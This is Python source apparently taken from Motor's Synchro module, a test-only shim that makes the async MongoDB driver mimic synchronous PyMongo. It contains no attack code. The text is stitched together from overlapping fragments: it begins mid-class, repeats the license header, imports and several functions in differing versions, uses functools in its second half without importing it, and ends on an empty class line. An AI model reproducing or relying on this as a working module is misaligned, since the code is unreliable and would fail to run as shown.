    def create_attribute(self, cls, attr_name):
        def fget(obj):
            # Plain delegation: read the attribute off the PyMongo object.
            return getattr(obj.delegate, attr_name)

        # Prefer an explicitly supplied docstring; otherwise inherit the
        # docstring of the PyMongo attribute being delegated to.
        doc = self.doc or getattr(cls.__delegate_class__, attr_name).__doc__
        if doc:
            return property(fget=fget, doc=doc)
        return property(fget=fget)
class DelegateMethod(ReadOnlyProperty):
    """A method on the wrapped PyMongo object that does no I/O and can be called
    synchronously"""

    def __init__(self, doc=None):
        ReadOnlyProperty.__init__(self, doc)
        # Motor class to wrap results in; None means "return results as-is".
        self.wrap_class = None

    def wrap(self, original_class):
        # Chainable configuration: results of `original_class` get wrapped.
        self.wrap_class = original_class
        return self

    def create_attribute(self, cls, attr_name):
        if self.wrap_class is None:
            # No wrapping requested: behave like a plain read-only delegate.
            return ReadOnlyProperty.create_attribute(self, cls, attr_name)

        method = getattr(cls.__delegate_class__, attr_name)
        original_class = self.wrap_class

        @functools.wraps(method)
        def wrapper(self_, *args, **kwargs):
            result = method(self_.delegate, *args, **kwargs)

            # Don't call isinstance(), not checking subclasses.
            if result.__class__ == original_class:
                # Delegate to the current object to wrap the result.
                return self_.wrap(result)
            else:
                return result

        if self.doc:
            wrapper.__doc__ = self.doc

        wrapper.is_wrap_method = True  # For Synchro.
        return wrapper
class MotorCursorChainingMethod(MotorAttributeFactory):
    def create_attribute(self, cls, attr_name):
        """Wrap a PyMongo cursor method so it mutates the delegate cursor
        and returns the Motor cursor, allowing call chaining.
        """
        cursor_method = getattr(cls.__delegate_class__, attr_name)

        @functools.wraps(cursor_method)
        def return_clone(self, *args, **kwargs):
            # Apply the method for its side effect on the PyMongo cursor,
            # then return the Motor cursor itself for chaining.
            cursor_method(self.delegate, *args, **kwargs)
            return self

        # This is for the benefit of Synchro, and motor_extensions.py
        return_clone.is_motorcursor_chaining_method = True
        return_clone.pymongo_method_name = attr_name
        if self.doc:
            return_clone.__doc__ = self.doc

        return return_clone
def create_class_with_framework(cls, framework, module_name):
    """Build (and cache) a framework-specific class from an agnostic one.

    `framework` supplies the async primitives; `module_name` becomes the
    new class's __module__. Results are memoized in `_class_cache` keyed on
    (cls, class name, framework).
    """
    motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__
    cache_key = (cls, motor_class_name, framework)
    cached_class = _class_cache.get(cache_key)
    if cached_class:
        return cached_class

    new_class = type(str(motor_class_name), cls.__bases__, cls.__dict__.copy())
    new_class.__module__ = module_name
    new_class._framework = framework

    assert hasattr(new_class, '__delegate_class__')

    # If we're constructing MotorClient from AgnosticClient, for example,
    # the method resolution order is (AgnosticClient, AgnosticBase, object).
    # Iterate over bases looking for attributes and coroutines that must be
    # replaced with framework-specific ones.
    for base in reversed(inspect.getmro(cls)):
        # Turn attribute factories into real methods or descriptors.
        for name, attr in base.__dict__.items():
            if isinstance(attr, MotorAttributeFactory):
                new_class_attr = attr.create_attribute(new_class, name)
                setattr(new_class, name, new_class_attr)
            elif getattr(attr, '_is_motor_coroutine', None) is _coro_token:
                # Replace the marker coroutine with a real framework coroutine.
                coro = framework.coroutine(attr)
                del coro._is_motor_coroutine
                coro.coroutine_annotation = True
                setattr(new_class, name, coro)

    _class_cache[cache_key] = new_class
    return new_class
def wrap_synchro(fn):
    """If decorated Synchro function returns a Motor object, wrap in a Synchro
    object.
    """
    @functools.wraps(fn)
    def _wrap_synchro(*args, **kwargs):
        rv = fn(*args, **kwargs)

        # Not all Motor classes appear here, only those we need to return
        # from methods like map_reduce() or create_collection(). Ordered so
        # more specific classes are tested before their bases.
        converters = [
            (motor.MotorCollection,
             lambda obj: Collection(
                 Database(MongoClient(delegate=obj.database.client),
                          obj.database.name),
                 obj.name, delegate=obj)),
            (motor.motor_tornado.MotorClientSession,
             lambda obj: ClientSession(delegate=obj)),
            (_MotorTransactionContext, _SynchroTransactionContext),
            (motor.MotorDatabase,
             lambda obj: Database(MongoClient(delegate=obj.client),
                                  obj.name, delegate=obj)),
            (motor.motor_tornado.MotorChangeStream, ChangeStream),
            (motor.motor_tornado.MotorLatentCommandCursor, CommandCursor),
            (motor.motor_tornado.MotorCommandCursor, CommandCursor),
            (_MotorRawBatchCommandCursor, CommandCursor),
            (motor.motor_tornado.MotorCursor, Cursor),
            (_MotorRawBatchCursor, Cursor),
            (motor.MotorGridIn, lambda obj: GridIn(None, delegate=obj)),
            (motor.MotorGridOut, lambda obj: GridOut(None, delegate=obj)),
            (motor.motor_tornado.MotorGridOutCursor, GridOutCursor),
        ]
        for motor_class, converter in converters:
            if isinstance(rv, motor_class):
                return converter(rv)

        # Anything else is passed through unchanged.
        return rv

    return _wrap_synchro
# Copyright 2012-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
"""Synchro, a fake synchronous PyMongo implementation built on top of Motor,
for the sole purpose of checking that Motor passes the same unittests as
PyMongo.
DO NOT USE THIS MODULE.
"""
import functools
import inspect

from tornado.ioloop import IOLoop
import motor
import motor.frameworks.tornado
import motor.motor_tornado
from motor.core import _MotorTransactionContext
from motor.metaprogramming import MotorAttributeFactory
# Make e.g. "from pymongo.errors import AutoReconnect" work. Note that
# importing * won't pick up underscore-prefixed attrs.
from gridfs.errors import *
from pymongo import *
from pymongo import (collation,
compression_support,
change_stream,
errors,
monotonic,
operations,
server_selectors,
server_type,
son_manipulator,
saslprep,
ssl_match_hostname,
ssl_support,
write_concern)
from pymongo.auth import _build_credentials_tuple
from pymongo.helpers import _check_command_response
from pymongo.change_stream import _NON_RESUMABLE_GETMORE_ERRORS
from pymongo.client_session import TransactionOptions
from pymongo.collation import *
from pymongo.common import *
from pymongo.common import _UUID_REPRESENTATIONS, _MAX_END_SESSIONS
from pymongo.compression_support import _HAVE_SNAPPY, _HAVE_ZLIB
from pymongo.cursor import *
from pymongo.cursor import _QUERY_OPTIONS
from pymongo.errors import *
from pymongo.message import (_COMMAND_OVERHEAD,
_CursorAddress,
_gen_find_command,
_maybe_add_read_preference)
from pymongo.monitor import *
from pymongo.monitoring import *
from pymongo.monitoring import _LISTENERS, _Listeners, _SENSITIVE_COMMANDS
from pymongo.monotonic import time
from pymongo.operations import *
from pymongo.pool import *
from pymongo.pool import _METADATA
from pymongo.periodic_executor import *
from pymongo.periodic_executor import _EXECUTORS
from pymongo.read_concern import *
from pymongo.read_preferences import *
from pymongo.read_preferences import _ServerMode
from pymongo.results import *
from pymongo.results import _WriteResult
from pymongo.server import *
from pymongo.server_selectors import *
from pymongo.settings import *
from pymongo.saslprep import *
from pymongo.ssl_support import *
from pymongo.son_manipulator import *
from pymongo.topology import *
from pymongo.topology_description import *
from pymongo.uri_parser import *
from pymongo.uri_parser import _partition, _rpartition, _HAVE_DNSPYTHON
from pymongo.write_concern import *
from pymongo import auth
from pymongo.auth import *
from pymongo.auth import _password_digest
from gridfs.grid_file import DEFAULT_CHUNK_SIZE, _SEEK_CUR, _SEEK_END
from pymongo import GEOSPHERE, HASHED
from pymongo.pool import SocketInfo, Pool
# Internal classes not declared in motor_tornado.py: retrieve from class cache.
from motor.core import (
AgnosticRawBatchCursor as _AgnosticRawBatchCursor,
AgnosticRawBatchCommandCursor as _AgnosticRawBatchCommandCursor)
from motor.motor_tornado import create_motor_class
# Build concrete Motor classes for the internal raw-batch cursors so
# wrap_synchro() can recognize them by type.
_MotorRawBatchCursor = create_motor_class(
    _AgnosticRawBatchCursor)
_MotorRawBatchCommandCursor = create_motor_class(
    _AgnosticRawBatchCommandCursor)
def unwrap_synchro(fn):
    """Unwrap Synchro objects passed to a method and pass Motor objects instead.
    """
    @functools.wraps(fn)
    def _unwrap_synchro(*args, **kwargs):
        def _unwrap_obj(obj):
            # Synchro wrappers expose the underlying Motor object as .delegate.
            return obj.delegate if isinstance(obj, Synchro) else obj

        unwrapped_args = [_unwrap_obj(a) for a in args]
        unwrapped_kwargs = {k: _unwrap_obj(v) for k, v in kwargs.items()}
        return fn(*unwrapped_args, **unwrapped_kwargs)

    return _unwrap_synchro
class SynchroAttr(object):
    """Base class for Synchro descriptors.

    `name` may be omitted; SynchroMeta fills it in when the descriptor is
    used directly in a class definition.
    """

    def __init__(self, name=None):
        self.name = name
class Sync(SynchroAttr):
    def __get__(self, obj, objtype):
        # Take the Motor method, run it to completion on the IOLoop, and
        # translate Synchro <-> Motor objects at the call boundary.
        motor_method = getattr(obj.delegate, self.name)
        synchronized = obj.synchronize(motor_method)
        return wrap_synchro(unwrap_synchro(synchronized))
class WrapOutgoing(SynchroAttr):
    def __get__(self, obj, objtype):
        # self.name is set by SynchroMeta.
        attr_name = self.name

        def synchro_method(*args, **kwargs):
            # Look up the Motor method at call time, then wrap its
            # (synchronously returned) Motor result in a Synchro object.
            target = getattr(obj.delegate, attr_name)
            return wrap_synchro(unwrap_synchro(target))(*args, **kwargs)

        return synchro_method
class SynchroProperty(SynchroAttr):
    """Fakes access to a private attribute (e.g. MongoClient.__member) by
    reaching straight through to the wrapped PyMongo object. Don't use it
    for real properties like write_concern or you'll mask missing features
    in Motor!
    """

    def __get__(self, obj, objtype):
        # Synchro -> Motor -> PyMongo; self.name is set by SynchroMeta.
        return getattr(obj.delegate.delegate, self.name)

    def __set__(self, obj, val):
        # Write straight onto the underlying PyMongo object.
        return setattr(obj.delegate.delegate, self.name, val)
def wrap_outgoing(delegate_attr):
    """Return True if Synchro must wrap this Motor attribute's return value
    (chaining cursor methods and wrap methods are so marked)."""
    markers = ('is_motorcursor_chaining_method', 'is_wrap_method')
    return any(getattr(delegate_attr, marker, False) for marker in markers)
class SynchroMeta(type):
    """This metaclass customizes creation of Synchro's MongoClient, Database,
    etc., classes:

    - All asynchronized methods of Motor classes, such as
      MotorDatabase.command(), are re-synchronized.

    - Properties delegated from Motor's classes to PyMongo's, such as ``name``
      or ``host``, are delegated **again** from Synchro's class to Motor's.

    - Motor methods which return Motor class instances are wrapped to return
      Synchro class instances.

    - Certain internals accessed by PyMongo's unittests, such as _Cursor__data,
      are delegated from Synchro directly to PyMongo.
    """

    def __new__(cls, name, bases, attrs):
        # Create the class, e.g. the Synchro MongoClient or Database class.
        new_class = type.__new__(cls, name, bases, attrs)

        # delegate_class is a Motor class like MotorClient.
        delegate_class = new_class.__delegate_class__

        if delegate_class:
            # Collect attributes across the Motor MRO; iterating base-first
            # means more-derived classes overwrite their bases.
            delegated_attrs = {}

            for klass in reversed(inspect.getmro(delegate_class)):
                delegated_attrs.update(klass.__dict__)

            for attrname, delegate_attr in delegated_attrs.items():
                # If attrname is in attrs, it means Synchro has overridden
                # this attribute, e.g. Collection.aggregate which is
                # special-cased. Ignore such attrs.
                if attrname in attrs:
                    continue

                if getattr(delegate_attr, 'is_async_method', False):
                    # Re-synchronize the method.
                    setattr(new_class, attrname, Sync(attrname))
                elif wrap_outgoing(delegate_attr):
                    # Wrap Motor objects in Synchro objects.
                    wrapper = WrapOutgoing()
                    wrapper.name = attrname
                    setattr(new_class, attrname, wrapper)
                elif isinstance(delegate_attr, property):
                    # Delegate the property from Synchro to Motor.
                    setattr(new_class, attrname, delegate_attr)

        # Set DelegateProperties' and SynchroProperties' names.
        for name, attr in attrs.items():
            if isinstance(attr, (MotorAttributeFactory, SynchroAttr)):
                if attr.name is None:
                    attr.name = name

        return new_class
class Synchro(object):
    """
    Wraps a MotorClient, MotorDatabase, MotorCollection, etc. and
    makes it act like the synchronous pymongo equivalent
    """
    # NOTE(review): __metaclass__ only takes effect on Python 2; on Python 3
    # the metaclass would need to be declared in the class header - confirm
    # the intended interpreter.
    __metaclass__ = SynchroMeta

    # Motor class wrapped by instances of this class; subclasses set it.
    __delegate_class__ = None

    def __cmp__(self, other):
        # NOTE(review): __cmp__ and the cmp() builtin are Python-2-only;
        # under Python 3 this method is never invoked - confirm intended.
        return cmp(self.delegate, other.delegate)

    def synchronize(self, async_method):
        """
        @param async_method: Bound method of a MotorClient, MotorDatabase, etc.
        @return: A synchronous wrapper around the method
        """
        @functools.wraps(async_method)
        def synchronized_method(*args, **kwargs):
            @functools.wraps(async_method)
            def partial():
                return async_method(*args, **kwargs)

            # Block the caller until the coroutine finishes on the IOLoop.
            return IOLoop.current().run_sync(partial)

        return synchronized_method
class MongoClient(Synchro):
    """Synchro wrapper for MotorClient, mimicking pymongo.MongoClient."""
    __delegate_class__ = motor.MotorClient

    HOST = 'localhost'
    PORT = 27017

    _cache_credentials = SynchroProperty()
    get_database = WrapOutgoing()
    max_pool_size = SynchroProperty()
    max_write_batch_size = SynchroProperty()
    # Name is filled in by SynchroMeta.
    start_session = Sync()

    def __init__(self, host=None, port=None, *args, **kwargs):
        # So that TestClient.test_constants and test_types work.
        host = host if host is not None else MongoClient.HOST
        port = port if port is not None else MongoClient.PORT
        self.delegate = kwargs.pop('delegate', None)

        # Motor passes connect=False by default.
        kwargs.setdefault('connect', True)
        if not self.delegate:
            self.delegate = self.__delegate_class__(host, port, *args, **kwargs)

    @property
    def is_locked(self):
        # MotorClient doesn't support the is_locked property.
        # Synchro has already synchronized current_op; use it.
        result = self.admin.current_op()
        return bool(result.get('fsyncLock', None))

    def __enter__(self):
        return self

    def __exit__(self, *args):
        self.delegate.close()

    def __getattr__(self, name):
        # Unknown attributes are database names, as in PyMongo.
        return Database(self, name, delegate=getattr(self.delegate, name))

    def __getitem__(self, name):
        return Database(self, name, delegate=self.delegate[name])

    # For PyMongo tests that access client internals.
    _MongoClient__all_credentials = SynchroProperty()
    _MongoClient__options = SynchroProperty()
    _get_topology = SynchroProperty()
    _topology = SynchroProperty()
    _kill_cursors_executor = SynchroProperty()
class _SynchroTransactionContext(Synchro):
    """Synchronous stand-in for Motor's transaction context manager."""

    def __init__(self, delegate):
        self.delegate = delegate

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Run the Motor session's end_session to completion on the IOLoop.
        end_session = self.delegate._session.end_session
        self.synchronize(end_session)()
class ClientSession(Synchro):
    """Synchro wrapper for MotorClientSession, mimicking PyMongo's
    ClientSession."""
    __delegate_class__ = motor.motor_tornado.MotorClientSession

    start_transaction = WrapOutgoing()
    client = SynchroProperty()

    def __init__(self, delegate):
        self.delegate = delegate

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # BUG FIX: the synchronized callable must actually be invoked -
        # previously the trailing () was missing, so end_session never ran
        # and the session was never ended (compare
        # _SynchroTransactionContext.__exit__).
        self.synchronize(self.delegate.end_session)()

    # For PyMongo tests that access session internals.
    _client = SynchroProperty()
    _in_transaction = SynchroProperty()
    _server_session = SynchroProperty()
    _transaction_id = SynchroProperty()
    _txn_read_preference = SynchroProperty()
class Database(Synchro):
    """Synchro wrapper for MotorDatabase."""
    __delegate_class__ = motor.MotorDatabase

    get_collection = WrapOutgoing()

    def __init__(self, client, name, **kwargs):
        assert isinstance(client, MongoClient), (
            "Expected MongoClient, got %s"
            % repr(client))
        self._client = client
        # An explicit 'delegate' kwarg wins; otherwise create a fresh
        # MotorDatabase on the client's delegate.
        self.delegate = kwargs.get('delegate') or motor.MotorDatabase(
            client.delegate, name, **kwargs)
        assert isinstance(self.delegate, motor.MotorDatabase), (
            "synchro.Database delegate must be MotorDatabase, not "
            " %s" % repr(self.delegate))

    @property
    def client(self):
        return self._client

    def __getattr__(self, name):
        # Unknown attributes are collection names, as in PyMongo.
        return Collection(self, name, delegate=getattr(self.delegate, name))

    def __getitem__(self, name):
        return Collection(self, name, delegate=self.delegate[name])
class Collection(Synchro):
    """Synchro wrapper for MotorCollection."""
    __delegate_class__ = motor.MotorCollection

    # Methods that return Motor objects which must be wrapped in Synchro ones.
    find = WrapOutgoing()
    find_raw_batches = WrapOutgoing()
    list_indexes = WrapOutgoing()
    watch = WrapOutgoing()

    def __init__(self, database, name, **kwargs):
        if not isinstance(database, Database):
            raise TypeError(
                "First argument to synchro Collection must be synchro "
                "Database, not %s" % repr(database))
        self.database = database
        self.delegate = kwargs.get('delegate') or motor.MotorCollection(
            self.database.delegate, name, **kwargs)

        if not isinstance(self.delegate, motor.MotorCollection):
            raise TypeError(
                "Expected to get synchro Collection from Database,"
                " got %s" % repr(self.delegate))

    def aggregate(self, *args, **kwargs):
        # Motor does no I/O initially in aggregate() but PyMongo does.
        func = wrap_synchro(unwrap_synchro(self.delegate.aggregate))
        cursor = func(*args, **kwargs)
        # Force the initial query now, to match PyMongo's behavior.
        self.synchronize(cursor.delegate._get_more)()
        return cursor

    def aggregate_raw_batches(self, *args, **kwargs):
        # Motor does no I/O initially in aggregate() but PyMongo does.
        func = wrap_synchro(unwrap_synchro(self.delegate.aggregate_raw_batches))
        cursor = func(*args, **kwargs)
        self.synchronize(cursor.delegate._get_more)()
        return cursor

    def __getattr__(self, name):
        # Access to collections with dotted names, like db.test.mike
        fullname = self.name + '.' + name
        return Collection(self.database, fullname,
                          delegate=getattr(self.delegate, name))

    def __getitem__(self, name):
        # Access to collections with dotted names, like db.test['mike']
        fullname = self.name + '.' + name
        return Collection(self.database, fullname,
                          delegate=self.delegate[name])
class ChangeStream(Synchro):
    """Synchro wrapper for MotorChangeStream; usable as a context manager
    like PyMongo's ChangeStream."""
    __delegate_class__ = motor.motor_tornado.MotorChangeStream

    # Blocking versions of the Motor coroutine methods.
    next = Sync('next')
    close = Sync('close')

    def __init__(self, motor_change_stream):
        self.delegate = motor_change_stream

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()
class Cursor(Synchro):
    """Synchro wrapper for MotorCursor, mimicking pymongo.cursor.Cursor."""
    __delegate_class__ = motor.motor_tornado.MotorCursor

    batch_size = WrapOutgoing()
    rewind = WrapOutgoing()
    clone = WrapOutgoing()
    close = Sync('close')

    def __init__(self, motor_cursor):
        self.delegate = motor_cursor

    def __iter__(self):
        return self

    # These are special cases, they need to be accessed on the class, not just
    # on instances.
    @wrap_synchro
    def __copy__(self):
        return self.delegate.__copy__()

    @wrap_synchro
    def __deepcopy__(self, memo):
        return self.delegate.__deepcopy__(memo)

    def next(self):
        """Return the next document, fetching a batch from the server if
        the local buffer is exhausted; raise StopIteration when done."""
        cursor = self.delegate
        if cursor._buffer_size():
            return cursor.next_object()
        elif cursor.alive:
            self.synchronize(cursor._get_more)()
            if cursor._buffer_size():
                return cursor.next_object()

        raise StopIteration

    def __getitem__(self, index):
        if isinstance(index, slice):
            return Cursor(self.delegate[index])
        else:
            # Fetch a single document eagerly, as PyMongo does.
            to_list = self.synchronize(self.delegate[index].to_list)
            return to_list(length=10000)[0]

    @property
    @wrap_synchro
    def collection(self):
        return self.delegate.collection

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()

        # Don't suppress exceptions.
        return False

    # For PyMongo tests that access cursor internals.
    _Cursor__data = SynchroProperty()
    _Cursor__exhaust = SynchroProperty()
    _Cursor__max_await_time_ms = SynchroProperty()
    _Cursor__max_time_ms = SynchroProperty()
    _Cursor__query_flags = SynchroProperty()
    _Cursor__query_spec = SynchroProperty()
    _Cursor__retrieved = SynchroProperty()
    _Cursor__spec = SynchroProperty()
    _read_preference = SynchroProperty()
class CommandCursor(Cursor):
    """Synchro wrapper for MotorCommandCursor; behaves like Cursor."""
    __delegate_class__ = motor.motor_tornado.MotorCommandCursor
class GridOutCursor(Cursor):
    """Synchro wrapper for MotorGridOutCursor; yields Synchro GridOuts."""
    __delegate_class__ = motor.motor_tornado.MotorGridOutCursor

    def __init__(self, delegate):
        if not isinstance(delegate, motor.motor_tornado.MotorGridOutCursor):
            raise TypeError(
                "Expected MotorGridOutCursor, got %r" % delegate)

        self.delegate = delegate

    def next(self):
        # Wrap each MotorGridOut the cursor yields in a Synchro GridOut.
        # NOTE(review): implicitly returns None for a falsy MotorGridOut -
        # presumably that never occurs; confirm.
        motor_grid_out = super(GridOutCursor, self).next()
        if motor_grid_out:
            return GridOut(self.collection, delegate=motor_grid_out)

    __next__ = next
class CursorManager(object):
    """Placeholder so PyMongo tests can import CursorManager."""
    # Motor doesn't support cursor managers, just avoid ImportError.
    pass
class BulkOperationBuilder(object):
    """Placeholder so PyMongo tests can import BulkOperationBuilder."""
    pass
class GridFSBucket(Synchro):
    """Synchro wrapper for MotorGridFSBucket."""
    __delegate_class__ = motor.MotorGridFSBucket

    def __init__(self, database, bucket_name='fs', disable_md5=False):
        if not isinstance(database, Database):
            raise TypeError(
                "Expected Database, got %s" % repr(database))

        self.delegate = motor.MotorGridFSBucket(
            database.delegate, bucket_name, disable_md5)

    def find(self, *args, **kwargs):
        # find() returns a Motor cursor synchronously; wrap it by hand.
        motor_method = self.delegate.find
        unwrapping_method = wrap_synchro(unwrap_synchro(motor_method))
        return unwrapping_method(*args, **kwargs)
class GridIn(Synchro):
    __delegate_class__ = motor.MotorGridIn

    def __init__(self, collection, **kwargs):
        """Can be created with collection and kwargs like a PyMongo GridIn,
        or with a 'delegate' keyword arg, where delegate is a MotorGridIn.
        """
        delegate = kwargs.pop('delegate', None)
        if delegate:
            self.delegate = delegate
        else:
            if not isinstance(collection, Collection):
                raise TypeError(
                    "Expected Collection, got %s" % repr(collection))

            self.delegate = motor.MotorGridIn(collection.delegate, **kwargs)

    def __getattr__(self, item):
        # Everything else delegates straight to the MotorGridIn.
        return getattr(self.delegate, item)
class SynchroGridOutProperty(object):
    """Descriptor for GridOut attributes: opens the underlying MotorGridOut
    before reading the named attribute from it."""

    def __init__(self, name):
        self.name = name

    def __get__(self, obj, objtype):
        # Ensure the delegate is opened before the attribute is read.
        opener = obj.synchronize(obj.delegate.open)
        opener()
        return getattr(obj.delegate, self.name)
class GridOut(Synchro):
    __delegate_class__ = motor.MotorGridOut

    # Each attribute opens the underlying MotorGridOut before reading.
    _id = SynchroGridOutProperty('_id')
    aliases = SynchroGridOutProperty('aliases')
    chunk_size = SynchroGridOutProperty('chunk_size')
    close = SynchroGridOutProperty('close')
    content_type = SynchroGridOutProperty('content_type')
    filename = SynchroGridOutProperty('filename')
    length = SynchroGridOutProperty('length')
    md5 = SynchroGridOutProperty('md5')
    metadata = SynchroGridOutProperty('metadata')
    name = SynchroGridOutProperty('name')
    upload_date = SynchroGridOutProperty('upload_date')

    def __init__(
            self, root_collection, file_id=None, file_document=None,
            delegate=None):
        """Can be created with collection and kwargs like a PyMongo GridOut,
        or with a 'delegate' keyword arg, where delegate is a MotorGridOut.
        """
        if delegate:
            self.delegate = delegate
        else:
            if not isinstance(root_collection, Collection):
                raise TypeError(
                    "Expected Collection, got %s" % repr(root_collection))

            self.delegate = motor.MotorGridOut(
                root_collection.delegate, file_id, file_document)

    def __getattr__(self, item):
        # Open the file (loading its metadata) before delegating unknown
        # attributes to the MotorGridOut.
        self.synchronize(self.delegate.open)()
        return getattr(self.delegate, item)

    def __setattr__(self, key, value):
        # PyMongo's GridOut prohibits setting these values; do the same
        # to make PyMongo's assertRaises tests pass.
        if key in (
                "_id", "name", "content_type", "length", "chunk_size",
                "upload_date", "aliases", "metadata", "md5"):
            raise AttributeError()

        super(GridOut, self).__setattr__(key, value)
class TimeModule(object):
    """Fake time module so time.sleep() lets other tasks run on the IOLoop.

    See e.g. test_schedule_refresh() in test_replica_set_client.py.
    """
    def __getattr__(self, item):
        def sleep(seconds):
            # Run the loop (letting other callbacks fire) until the timeout.
            loop = IOLoop.current()
            loop.add_timeout(time.time() + seconds, loop.stop)
            loop.start()

        if item == 'sleep':
            return sleep
        else:
            # Everything else delegates to the real time module.
            return getattr(time, item)
def unwrap_synchro(fn):
    """Unwrap Synchro objects passed to a method and pass Motor objects
    instead.
    """
    @functools.wraps(fn)
    def _unwrap_synchro(*args, **kwargs):
        def _unwrap_obj(obj):
            # Synchro wrappers hold their Motor object as .delegate.
            if isinstance(obj, Synchro):
                return obj.delegate
            return obj

        return fn(*[_unwrap_obj(a) for a in args],
                  **dict((k, _unwrap_obj(v)) for k, v in kwargs.items()))

    return _unwrap_synchro


# Copyright 2012-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
"""Synchro, a fake synchronous PyMongo implementation built on top of Motor,
for the sole purpose of checking that Motor passes the same unittests as
PyMongo.
DO NOT USE THIS MODULE.
"""
import inspect
from tornado.ioloop import IOLoop
import motor
import motor.frameworks.tornado
import motor.motor_tornado
from motor.core import _MotorTransactionContext
from motor.metaprogramming import MotorAttributeFactory
# Make e.g. "from pymongo.errors import AutoReconnect" work. Note that
# importing * won't pick up underscore-prefixed attrs.
from gridfs.errors import *
from pymongo import *
from pymongo import (collation,
compression_support,
change_stream,
errors,
monotonic,
operations,
server_selectors,
server_type,
son_manipulator,
saslprep,
ssl_match_hostname,
ssl_support,
write_concern)
from pymongo.auth import _build_credentials_tuple
from pymongo.helpers import _check_command_response
from pymongo.change_stream import _NON_RESUMABLE_GETMORE_ERRORS
from pymongo.client_session import TransactionOptions
from pymongo.collation import *
from pymongo.common import *
from pymongo.common import _UUID_REPRESENTATIONS, _MAX_END_SESSIONS
from pymongo.compression_support import _HAVE_SNAPPY, _HAVE_ZLIB
from pymongo.cursor import *
from pymongo.cursor import _QUERY_OPTIONS
from pymongo.errors import *
from pymongo.message import (_COMMAND_OVERHEAD,
_CursorAddress,
_gen_find_command,
_maybe_add_read_preference)
from pymongo.monitor import *
from pymongo.monitoring import *
from pymongo.monitoring import _LISTENERS, _Listeners, _SENSITIVE_COMMANDS
from pymongo.monotonic import time
from pymongo.operations import *
from pymongo.pool import *
from pymongo.pool import _METADATA
from pymongo.periodic_executor import *
from pymongo.periodic_executor import _EXECUTORS
from pymongo.read_concern import *
from pymongo.read_preferences import *
from pymongo.read_preferences import _ServerMode
from pymongo.results import *
from pymongo.results import _WriteResult
from pymongo.server import *
from pymongo.server_selectors import *
from pymongo.settings import *
from pymongo.saslprep import *
from pymongo.ssl_support import *
from pymongo.son_manipulator import *
from pymongo.topology import *
from pymongo.topology_description import *
from pymongo.uri_parser import *
from pymongo.uri_parser import _partition, _rpartition, _HAVE_DNSPYTHON
from pymongo.write_concern import *
from pymongo import auth
from pymongo.auth import *
from pymongo.auth import _password_digest
from gridfs.grid_file import DEFAULT_CHUNK_SIZE, _SEEK_CUR, _SEEK_END
from pymongo import GEOSPHERE, HASHED
from pymongo.pool import SocketInfo, Pool
# Internal classes not declared in motor_tornado.py: retrieve from class cache.
from motor.core import (
AgnosticRawBatchCursor as _AgnosticRawBatchCursor,
AgnosticRawBatchCommandCursor as _AgnosticRawBatchCommandCursor)
from motor.motor_tornado import create_motor_class
# Build concrete Motor classes for the internal raw-batch cursors so
# wrap_synchro() can recognize them by type.
_MotorRawBatchCursor = create_motor_class(
    _AgnosticRawBatchCursor)
_MotorRawBatchCommandCursor = create_motor_class(
    _AgnosticRawBatchCommandCursor)
def wrap_synchro(fn):
    """If decorated Synchro function returns a Motor object, wrap in a Synchro
    object.
    """
    @functools.wraps(fn)
    def _wrap_synchro(*args, **kwargs):
        motor_obj = fn(*args, **kwargs)

        # Not all Motor classes appear here, only those we need to return
        # from methods like map_reduce() or create_collection()
        # NOTE(review): checks appear ordered so more specific classes match
        # before their bases (e.g. MotorLatentCommandCursor before
        # MotorCommandCursor) - confirm the class hierarchy.
        if isinstance(motor_obj, motor.MotorCollection):
            client = MongoClient(delegate=motor_obj.database.client)
            database = Database(client, motor_obj.database.name)
            return Collection(database, motor_obj.name, delegate=motor_obj)
        if isinstance(motor_obj, motor.motor_tornado.MotorClientSession):
            return ClientSession(delegate=motor_obj)
        if isinstance(motor_obj, _MotorTransactionContext):
            return _SynchroTransactionContext(motor_obj)
        if isinstance(motor_obj, motor.MotorDatabase):
            client = MongoClient(delegate=motor_obj.client)
            return Database(client, motor_obj.name, delegate=motor_obj)
        if isinstance(motor_obj, motor.motor_tornado.MotorChangeStream):
            return ChangeStream(motor_obj)
        if isinstance(motor_obj, motor.motor_tornado.MotorLatentCommandCursor):
            return CommandCursor(motor_obj)
        if isinstance(motor_obj, motor.motor_tornado.MotorCommandCursor):
            return CommandCursor(motor_obj)
        if isinstance(motor_obj, _MotorRawBatchCommandCursor):
            return CommandCursor(motor_obj)
        if isinstance(motor_obj, motor.motor_tornado.MotorCursor):
            return Cursor(motor_obj)
        if isinstance(motor_obj, _MotorRawBatchCursor):
            return Cursor(motor_obj)
        if isinstance(motor_obj, motor.MotorGridIn):
            return GridIn(None, delegate=motor_obj)
        if isinstance(motor_obj, motor.MotorGridOut):
            return GridOut(None, delegate=motor_obj)
        if isinstance(motor_obj, motor.motor_tornado.MotorGridOutCursor):
            return GridOutCursor(motor_obj)
        else:
            # Anything else is passed through unchanged.
            return motor_obj

    return _wrap_synchro
class SynchroAttr(object):
    """Base class for Synchro descriptors; holds the delegated attr name."""
    # Name can be set by SynchroMeta if Sync() is used directly in class defn.
    def __init__(self, name=None):
        self.name = name
class Sync(SynchroAttr):
    def __get__(self, obj, objtype):
        # Synchronize the Motor method and translate Synchro <-> Motor
        # objects at the call boundary.
        async_method = getattr(obj.delegate, self.name)
        return wrap_synchro(unwrap_synchro(obj.synchronize(async_method)))
class WrapOutgoing(SynchroAttr):
